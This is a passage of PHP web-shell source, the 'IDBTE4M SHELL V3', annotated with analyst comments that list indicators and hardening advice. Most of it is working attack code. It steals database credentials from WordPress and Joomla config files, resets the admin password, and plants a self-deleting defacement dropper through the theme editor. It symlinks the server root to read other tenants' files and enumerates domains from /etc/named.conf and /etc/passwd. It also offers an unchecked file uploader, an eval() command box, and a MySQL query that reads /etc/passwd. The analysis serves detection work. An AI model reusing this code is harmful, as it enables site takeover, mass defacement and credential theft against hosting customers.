  2710. $dol = '$';
  // $dol keeps a literal "$" out of double-quoted interpolation while the dropper source is assembled.
  2711. $preindex = "<?php
  2712. ".$dol."def = file_get_contents('".$index."');
  2713. ".$dol."p = explode('public_html',dirname(__FILE__));
  2714. ".$dol."p = ".$dol."p[0].'public_html';
  2715. if (".$dol."handle = opendir(".$dol."p)) {
  2716. ".$dol."p1 = @fopen(".$dol."p.'/index.html','w+');
  2717. @fwrite(".$dol."fp1, ".$dol."def);
  2718. ".$dol."p1 = @fopen(".$dol."p.'/index.php','w+');
  2719. @fwrite(".$dol."fp1, ".$dol."def);
  2720. ".$dol."fp1 = @fopen(".$dol."p.'/index.htm','w+');
  2721. @fwrite(".$dol."fp1, ".$dol."def);
  2722. echo 'Done';
  2723. }
  2724. closedir(".$dol."handle);
  2725. unlink(__FILE__);
  2726. ?>";
  2727. $content = base64_encode($preindex);
  2728. $output = '';
  2729. $dol = '$';
  2730. $go = 0;
  // Credential harvest: each call pulls one value out of the wp-config.php text passed in $conf.
  2731. $username = tunisia($conf,"define('DB_USER', '","');");
  2732. $password = tunisia($conf,"define('DB_PASSWORD', '","');");
  2733. $dbname = tunisia($conf,"define('DB_NAME', '","');");
  2734. $prefix = tunisia($conf,$dol."table_prefix = '","'");
  2735. $host = tunisia($conf,"define('DB_HOST', '","');");
  2736.  
  2737. $link=mysql_connect($host,$username,$password);
  2738. if($link) {
  2739. mysql_select_db($dbname,$link) ;
  2740. $dol = '$';
  // Account takeover: rewrites login name and password hash of user ID 1. The 32-hex value is presumably
  // an MD5 of the password posted to wp-login.php below — TODO confirm. It is a usable database IoC.
  2741. $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '71a4d4cd2f30b185d707718273b17d05' WHERE `ID` = 1");
  2742. } else {
  2743. $output.= "[-] DB Error<br />";
  2744. }
  2745. if($req1) {
  2746.  
  // Reads the 'home', 'template' and 'current_theme' rows from <prefix>options to locate the site and theme.
  2747. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
  2748. $data = mysql_fetch_array($req);
  2749. $site_url=$data["option_value"];
  2750.  
  2751. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
  2752. $data = mysql_fetch_array($req);
  2753. $template = $data["option_value"];
  2754.  
  2755. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
  2756. $data = mysql_fetch_array($req);
  2757. $current_theme = $data["option_value"];
  2758.  
  // Fixed User-Agent string: a log-search indicator for the requests made from here on.
  2759. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  2760. $url2=$site_url."/wp-login.php";
  2761.  
  // Login with the planted account; session cookies are stored in COOKIE.txt in the working directory.
  2762. $ch = curl_init();
  2763. curl_setopt($ch, CURLOPT_URL, $url2);
  2764. curl_setopt($ch, CURLOPT_POST, 1);
  2765. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=jancok&rememberme=forever&wp-submit=Log In&testcookie=1");
  2766. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2767. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  2768. curl_setopt($ch, CURLOPT_HEADER, 0);
  2769. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  2770. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2771. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  2772. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  2773. $buffer = curl_exec($ch);
  2774.  
  // Login success is inferred from "action=logout" appearing in the response body.
  2775. $pos = strpos($buffer,"action=logout");
  2776. if($pos === false) {
  2777. $output.= "[-] Login Error<br />";
  2778. } else {
  2779. $output.= "[+] Login Successful<br />";
  2780. $go = 1;
  2781. }
  2782. if($go) {
  2783. $cond = 0;
  // First theme-editor URL form (file=/themes/<template>/index.php&theme=...&dir=theme).
  2784. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
  2785. curl_setopt($ch, CURLOPT_URL, $url2);
  2786. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  2787. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  2788. curl_setopt($ch, CURLOPT_HEADER, 0);
  2789. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2790. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  2791. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  2792. $buffer0 = curl_exec($ch);
  2793.  
  // The editor form's _wpnonce and file fields are scraped from the returned HTML and replayed in the save POST.
  2794. $_wpnonce = tunisia($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  2795. $_file = tunisia($buffer0,'<input type="hidden" name="file" value="','" />');
  2796.  
  2797. if(substr_count($_file,"/index.php") != 0){
  2798. $output.= "[+] index.php loaded in Theme Editor<br />";
  2799. $url2=$site_url."/wp-admin/theme-editor.php";
  2800. curl_setopt($ch, CURLOPT_URL, $url2);
  2801. curl_setopt($ch, CURLOPT_POST, 1);
  2802. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  2803. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2804. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2805. curl_setopt($ch, CURLOPT_HEADER, 0);
  2806. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2807. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  2808. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  2809. $buffer = curl_exec($ch);
  2810. curl_close($ch);
  2811.  
  // Save is treated as successful when WordPress's "updated" message div is present.
  2812. $pos = strpos($buffer,'<div id="message" class="updated">');
  2813. if($pos === false) {
  2814. $output.= "[-] Updating Index.php Error<br />";
  2815. } else {
  2816. $output.= "[+] Index.php Updated Successfuly<br />";
  2817. $hk = explode('public_html',$_file);
  // Requests the edited file over HTTP and appends the response to the log (presumably this is what runs the dropper).
  2818. $output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
  2819. $cond = 1;
  2820. }
  2821. } else {
  // Second theme-editor URL form (file=index.php&theme=<template>), tried when the first did not load index.php.
  2822. $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
  2823. curl_setopt($ch, CURLOPT_URL, $url2);
  2824. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  2825. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2826. curl_setopt($ch, CURLOPT_HEADER, 0);
  2827. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2828. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  2829. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  2830. $buffer0 = curl_exec($ch);
  2831.  
  2832. $_wpnonce = tunisia($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  2833. $_file = tunisia($buffer0,'<input type="hidden" name="file" value="','" />');
  2834.  
  2835. if(substr_count($_file,"index.php") != 0){
  2836. $output.= "[+] index.php loaded in Theme Editor<br />";
  2837. $url2=$site_url."/wp-admin/theme-editor.php";
  2838. curl_setopt($ch, CURLOPT_URL, $url2);
  2839. curl_setopt($ch, CURLOPT_POST, 1);
  2840. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
  2841. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2842. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2843. curl_setopt($ch, CURLOPT_HEADER, 0);
  2844. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2845. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  2846. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  2847. $buffer = curl_exec($ch);
  2848. curl_close($ch);
  2849.  
  2850. $pos = strpos($buffer,'<div id="message" class="updated">');
  2851. if($pos === false) {
  2852. $output.= "[-] Updating Index.php Error<br />";
  2853. } else {
  2854. $output.= "[+] Index.php Template Updated Successfuly<br />";
  2855. $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
  2856. $cond = 1;
  2857. }
  2858. } else {
  2859. $output.= "[-] index.php can not load in Theme Editor<br />";
  2860. }
  2861. }
  2862. }
  2863. } else {
  2864. $output.= "[-] DB Error<br />";
  2865. }
  // Cleanup of the cookie jar; $base_path is a global set outside this excerpt.
  2866. global $base_path;
  2867. unlink($base_path.'COOKIE.txt');
  2868. return array('cond'=>$cond, 'output'=>$output , 'template'=> $template);
  2869. }
  2870.  
  // ANALYST NOTE (malicious code): "mode 2" of the mass-defacement feature (POST field mode=2).
  // Visible steps: create a sym/ directory, drop a .htaccess that enables Indexes/FollowSymLinks and remaps
  // .php to a non-PHP type/handler, symlink sym/root to /, build a domain list from an HTML listing fetched
  // through that symlink, resolve owning accounts by running `ls -la` on /etc/valiases/<domain>, then probe
  // fixed Joomla/WordPress config locations under each account's public_html and call the index_changer_*
  // helpers. $base_url and tunisia() are defined outside this excerpt.
  // Host indicators created in the shell's directory: sym/, sym/.htaccess (contains "DirectoryIndex idb.phtml"),
  // sym/root -> /, sites.txt, mail.txt, userdom.txt, fail.txt, success.txt, defaced.html.
  // Shared-hosting hardening against this technique: do not let tenants set Options FollowSymLinks or handler
  // mappings from .htaccess (restrict AllowOverride; SymLinksIfOwnerMatch where symlinks are needed), keep
  // other tenants' home directories and CMS config files unreadable, and disable exec-family functions for
  // web-facing PHP where possible.
  2871. if($_POST['mode']==2) {
  2872. // symlinking
  2873. @mkdir('sym',0777);
  2874. $htaccess = "Options Indexes FollowSymLinks\nDirectoryIndex idb.phtml\nAddType txt .php\nAddHandler txt .php";
  2875. file_put_contents("sym/.htaccess",$htaccess);
  2876. @symlink('/','sym/root');
  2877.  
  2878.  
  2879. // getting sites from (/etc/passwd) file
  // The response is treated as an HTML listing: it is split on '<li><a href="' anchors and '.db' is stripped.
  2880. $named=file_get_contents($base_url.'/sym/root/etc/passwd/');
  2881. $ar = explode('<li><a href="', $named);
  2882. for($vi=2;$vi < count($ar);$vi++)
  2883. {
  2884. $var1 = strtok($ar[$vi], " ");
  2885. $var1 = substr($var1,0,-2);
  2886. $old=('.db');
  2887. $new=('');
  2888. $sites = str_replace($old , $new , $var1);
  2889. file_put_contents('sites.txt',$sites);
  2890. }
  2891.  
  2892. // getting usernames
  // Runs a shell command per line of sites.txt; exec() returns the last output line, which is appended to mail.txt.
  2893. $domains=file('sites.txt');
  2894. foreach ($domains as $domain) {
  2895. $order=("ls -la /etc/valiases/".$domain);
  2896. $exec=exec($order);
  2897. $filename = 'mail.txt';
  2898. $fp = fopen($filename, "a+");
  2899. $write = fputs($fp, $exec."\n");
  2900. fclose($fp);
  2901. }
  2902.  
  // Parses each ls line into "<owner>:<domain>" and appends it to userdom.txt.
  2903. $mail=file('mail.txt');
  2904. foreach ($mail as $finaldom) {
  2905. $user=tunisia($finaldom,"-rw-r----- 1 "," mail");
  2906. $site=substr(strstr($finaldom, '/etc/valiases'),14);
  2907.  
  2908. $filename = 'userdom.txt';
  2909. $fp = fopen($filename, "a+");
  2910. $write = fputs($fp, $user.":". $site." ");
  2911. fclose($fp);
  2912.  
  2913. }
  2914.  
  // Entries shorter than 6 characters are written to fail.txt, all others to success.txt.
  2915. $f=file_get_contents('userdom.txt');
  2916. $finals=explode(" ",$f);
  2917. foreach ($finals as $final){
  2918. $strlen=('6');
  2919. $dr=strlen ($final);
  2920. if ($dr < $strlen) {
  2921. $filename = 'fail.txt';
  2922. $fp = fopen($filename, "a");
  2923. $write = fputs($fp, $final);
  2924. fclose($fp);
  2925. }
  2926. else {
  2927. $filename = 'success.txt';
  2928. $fp = fopen($filename, "a");
  2929. $write = fputs($fp, $final."\n");
  2930. fclose($fp);
  2931. }
  2932. }
  2933.  
  2934. // now to work
  // $_POST['tunisia'] is the operator-supplied URL of the replacement page; defaced.html collects result links.
  2935. $index=$_POST['tunisia'];
  2936. $url=($base_url);
  2937. $a=file($base_url.'/success.txt');
  2938. echo ("<center><table class='result' width='100%' border=1 cellspacing=1 cellpading=1>
  2939. <tr><th width=50%>domain</td><th width=25%>Type</td><th width=25%>Status</td></tr>");
  2940. $khaled = fopen('defaced.html', 'a+');
  2941. foreach ($a as $final) {
  2942. list($user, $site_url) = explode(":", $final);
  2943. $site_urlto = substr($site_url, 0, -1);
  // Candidate config locations, all reached through the sym/root symlink under the account's public_html.
  2944. // joomla symlinks
  2945. $joomla=$url."/sym/root/home/".$user."/public_html/configuration.php";
  2946. $joomla2=$url."/sym/root/home/".$user."/public_html/joomla/configuration.php";
  2947. $joomla3=$url."/sym/root/home/".$user."/public_html/site/configuration.php";
  2948. // wordpress symlinks
  2949. $wordpress=$url."/sym/root/home/".$user."/public_html/wp-config.php";
  2950. $wordpress2=$url."/sym/root/home/".$user."/public_html/blog/wp-config.php";
  2951. $wordpress3=$url."/sym/root/home/".$user."/public_html/wp/wp-config.php";
  2952.  
  // Each of the six sections below follows the same shape: test the candidate, print a result row, call the
  // matching index_changer_* helper, log a link to defaced.html on reported success and bump a counter.
  // Values taken from the harvested files are echoed into the HTML without escaping.
  2953. // first joomla guess
  2954. if($joomla && preg_match('/dbprefix/i',$joomla)){
  2955. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  2956. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  2957. $res = index_changer_joomla($joomla, $index, $site_urlto);
  2958. echo '<td>'.$res['output'].'</td>';
  2959. if($res['cond']) {
  2960. echo '<td align="center"><span class="green">DEFACED</span></td>';
  2961. fwrite($khaled, 'http://'.$site_urlto.'/templates/'.$res['template'].'/index.php<br>');
  2962. $count1 = $count1+1;
  2963. } else {
  2964. echo '<td align="center"><span class="blue">FAILED</span></td>';
  2965. }
  2966. echo '</tr>';
  2967. }
  2968. // second joomla guess
  2969. if($joomla2 && preg_match('/dbprefix/i',$joomla2)){
  2970. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  2971. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  2972. $res = index_changer_joomla($joomla2, $index, $site_urlto);
  2973. echo '<td>'.$res['output'].'</td>';
  2974. if($res['cond']) {
  2975. echo '<td align="center"><span class="green">DEFACED</span></td>';
  2976. fwrite($khaled, 'http://'.$site_urlto.'/joomla/'.$res['template'].'/index.php<br>');
  2977. $count1 = $count1+1;
  2978. } else {
  2979. echo '<td align="center"><span class="blue">FAILED</span></td>';
  2980. }
  2981. echo '</tr>';
  2982. }
  2983. // third joomla guess
  2984. if($joomla3 && preg_match('/dbprefix/i',$joomla3)){
  2985. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  2986. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  2987. $res = index_changer_joomla($joomla3, $index, $site_urlto);
  2988. echo '<td>'.$res['output'].'</td>';
  2989. if($res['cond']) {
  2990. echo '<td align="center"><span class="green">DEFACED</span></td>';
  2991. fwrite($khaled, 'http://'.$site_urlto.'/site/'.$res['template'].'/index.php<br>');
  2992. $count1 = $count1+1;
  2993. } else {
  2994. echo '<td align="center"><span class="blue">FAILED</span></td>';
  2995. }
  2996. echo '</tr>';
  2997. }
  2998.  
  2999. // first wordpress guess
  3000. if($wordpress && preg_match('/DB_NAME/i',$wordpress)){
  3001. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  3002. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  3003. $res = index_changer_wp($wordpress, $index);
  3004. echo '<td>'.$res['output'].'</td>';
  3005. if($res['cond']) {
  3006. echo '<td align="center"><span class="green">DEFACED</span></td>';
  3007. fwrite($khaled, 'http://'.$site_urlto.'/wp-content/themes/'.$res['template'].'/index.php<br>');
  3008. $count2++;
  3009. } else {
  3010. echo '<td align="center"><span class="blue">FAILED</span></td>';
  3011. }
  3012. echo '</tr>';
  3013. }
  3014.  
  3015. // second wordpress guess
  3016. if($wordpress2 && preg_match('/DB_NAME/i',$wordpress2)){
  3017. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  3018. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  3019. $res = index_changer_wp($wordpress2, $index);
  3020. echo '<td>'.$res['output'].'</td>';
  3021. if($res['cond']) {
  3022. echo '<td align="center"><span class="green">DEFACED</span></td>';
  3023. fwrite($khaled, 'http://'.$site_urlto.'/blog/wp-content/themes/'.$res['template'].'/index.php<br>');
  3024. $count2++;
  3025. } else {
  3026. echo '<td align="center"><span class="blue">FAILED</span></td>';
  3027. }
  3028. echo '</tr>';
  3029. }
  3030.  
  3031. // third wordpress guess
  3032. if($wordpress3 && preg_match('/DB_NAME/i',$wordpress3)){
  3033. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  3034. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  3035. $res = index_changer_wp($wordpress3, $index);
  3036. echo '<td>'.$res['output'].'</td>';
  3037. if($res['cond']) {
  3038. echo '<td align="center"><span class="green">DEFACED</span></td>';
  3039. fwrite($khaled, 'http://'.$site_urlto.'/wp/wp-content/themes/'.$res['template'].'/index.php<br>');
  3040. $count2++;
  3041. } else {
  3042. echo '<td align="center"><span class="blue">FAILED</span></td>';
  3043. }
  3044. echo '</tr>';
  3045. }
  3046.  
  3047. }
  3048. echo '</table>';
  3049. echo '<hr/>';
  3050. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
  3051. echo '<a href="defaced.html" target="_blank">Show All</a><br />';
  3052. }
  3053.  
  // ANALYST NOTE (malicious code): "mode 1" of the mass-defacement feature (POST field mode=1).
  // Differences from mode 2 that are visible here: the domain list comes from zone names matched in
  // /etc/named.conf, the owning account is resolved with fileowner() on /etc/valiases/<domain> plus
  // posix_getpwuid(), and the CMS config files are fetched over HTTP through sym/root/home/<user>/public_html/
  // so their contents (not their paths) are handed to index_changer_joomla()/index_changer_wp().
  // The .htaccess written here is a distinct signature: "Options all", "DirectoryIndex Sux.html",
  // text/plain mappings for .php and .html, "Require None", "Satisfy Any".
  // Host indicators: sym/, sym/.htaccess, sym/root -> /, defaced.html. Network indicators: requests from the
  // server to its own /sym/root/home/... URLs. The hardening listed for symlink-based cross-tenant reads
  // (restricted AllowOverride/Options, unreadable home directories and config files) applies equally.
  3054. elseif($_POST['mode']==1) {
  3055. @mkdir('sym',0777);
  3056. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  3057. $fp = @fopen ('sym/.htaccess','w');
  3058. fwrite($fp, $wr);
  3059. @symlink('/','sym/root');
  // Domain enumeration from the DNS server configuration; duplicates are removed before counting.
  3060. $dominios = @file_get_contents("/etc/named.conf");
  3061. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  3062. $out[1] = array_unique($out[1]);
  3063. $numero_dominios = count($out[1]);
  3064. echo "Total domains: $numero_dominios <br><br />";
  // $_POST['tunisia'] is the operator-supplied URL of the replacement page.
  3065. $def = $_POST['tunisia'];
  3066. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
  3067. $output = fopen('defaced.html', 'a+');
  3068. echo ("<center><table class='result' width='100%' border=1 cellspacing=1 cellpading=1>
  3069. <tr><th width=50%>domain</td><th width=25%>Type</td><th width=25%>Status</td></tr>");
  3070. $j = 1;
  // Optional GET parameter st sets the index of the first domain to process.
  3071. $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
  3072. for($i = $st; $i <= $numero_dominios; $i++)
  3073. {
  3074. $domain = $out[1][$i];
  3075. $dono_arquivo = @fileowner("/etc/valiases/".$domain);
  3076. $infos = @posix_getpwuid($dono_arquivo);
  3077.  
  // Domains whose valiases file is owned by root are skipped; for the rest, four fixed config locations are read.
  3078. if($infos['name']!='root') {
  3079. $config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
  3080. $config001 = @file_get_contents($base_url.$infos['name']."/public_html/joomla/configuration.php");
  3081. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
  3082. $config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
  3083.  
  // A config is classified by a marker string in its text: "dbprefix" for Joomla, "DB_NAME" for WordPress.
  3084. if($config001 && preg_match('/dbprefix/i',$config001)){
  3085. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  3086. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  3087. $res = index_changer_joomla($config001, $def, $domain);
  3088. echo '<td>'.$res['output'].'</td>';
  3089. if($res['cond']) {
  3090. echo '<td align="center"><span class="green">DEFACED</span></td>';
  3091. fwrite($output, 'http://'.$domain."<br>");
  3092. $count1 = $count+1;
  3093. } else {
  3094. echo '<td align="center"><span class="blue">FAILED</span></td>';
  3095. }
  3096. echo '</tr>';
  3097. }
  3098.  
  3099. if($config01 && preg_match('/dbprefix/i',$config01)){
  3100. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  3101. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  3102. $res = index_changer_joomla($config01, $def, $domain);
  3103. echo '<td>'.$res['output'].'</td>';
  3104. if($res['cond']) {
  3105. echo '<td align="center"><span class="green">DEFACED</span></td>';
  3106. fwrite($output, 'http://'.$domain."<br>");
  3107. $count1 = $count+1;
  3108. } else {
  3109. echo '<td align="center"><span class="blue">FAILED</span></td>';
  3110. }
  3111. echo '</tr>';
  3112. }
  3113.  
  3114. if($config02 && preg_match('/DB_NAME/i',$config02)){
  3115. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  3116. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  3117. $res = index_changer_wp($config02, $def);
  3118. echo '<td>'.$res['output'].'</td>';
  3119. if($res['cond']) {
  3120. echo '<td align="center"><span class="green">DEFACED</span></td>';
  3121. fwrite($output, 'http://'.$domain."<br>");
  3122. $count2 = $count2+1;
  3123. } else {
  3124. echo '<td align="center"><span class="blue">FAILED</span></td>';
  3125. }
  3126. echo '</tr>';
  3127. }
  3128. if($config03 && preg_match('/DB_NAME/i',$config03)){
  3129. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  3130. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  3131. $res = index_changer_wp($config03, $def);
  3132. echo '<td>'.$res['output'].'</td>';
  3133. if($res['cond']) {
  3134. echo '<td align="center"><span class="green">DEFACED</span></td>';
  3135. fwrite($output, 'http://'.$domain."<br>");
  3136. $count2 = $count2+1;
  3137. } else {
  3138. echo '<td align="center"><span class="blue">FAILED</span></td>';
  3139. }
  3140. echo '</tr>';
  3141. }
  3142. }
  3143. }
  3144. echo '</table>';
  3145. echo '<hr/>';
  3146. echo 'Total Defaced = '.$count1 + $count2.' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
  3147. echo '<a href="defaced.html" target="_blank">Show All</a><br />';
  3148. }
  // ANALYST NOTE (malicious code): default view when no mode was posted. It only prints the operator form:
  // a text field "tunisia" (URL of the replacement page), a radio "mode" (1 = /etc/named.conf, 2 = /etc/passwd)
  // and a submit button "tunisia_deface". These field names and the banner string in the markup below are
  // stable strings for content signatures and for matching POST bodies in web-server or WAF logs.
  3149. else {
  3150.  
  3151. echo '
  3152. <table>
  3153.  
  3154. <form method="post">
  3155. <tr>
  3156. <td>index url : </td>
  3157. <td><input type="text" size="60" name="tunisia" placeholder="put your index url here !"></td>
  3158. </tr>
  3159. <tr>
  3160. <td><input type="radio" checked="checked" value="1" name="mode"></td><td>/etc/named.conf</td>
  3161.  
  3162. <td><input type="radio" value="2" name="mode"></td><td>/etc/passwd</td>
  3163.  
  3164. <td><input type="submit" name="tunisia_deface" value="Deface"></td>
  3165. </tr>
  3166. </form>
  3167. </center><p>
  3168. -=[ IDBTE4M SHELL V3 BY KEFIEX404 ]=-
  3169. </body>
  3170. </html>
  3171. ';
  3172. }
  3173. ?>
  3174. <?php
  // ANALYST NOTE (malicious code): file-upload feature of the shell. The form is always printed; when the
  // POST field _upl equals "Upload", the uploaded temp file is copied into the current working directory
  // under the client-supplied file name, with no extension or content-type check, and errors are suppressed.
  // Detection: multipart POSTs to this script carrying the _upl field, followed by new files appearing next
  // to it. Prevention: web-writable directories should not allow script execution, and the PHP process
  // should not have write access to the document root.
  3175. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  3176. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  3177. if( $_POST['_upl'] == "Upload" ) {
  3178. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
  3179. else { echo '<br /><br />Not uploaded !!<br><br>'; }
  3180.  
  3181.  
  3182. }
  3183. ?>
  3184. <?php
  3185. if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
  3186. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  3187. <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); }
  3188. else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea>
  3189. <tr><td><input style="width:6%;margin:0px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form>
  3190. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
  3191. if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){
  3192. $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
  3193. if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  3194. $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  3195. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>"; if(isset($_GET['db']))
  3196. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  3197. if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  3198. $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  3199. $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
  3200. $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
  3201. $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
  3202. $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables);
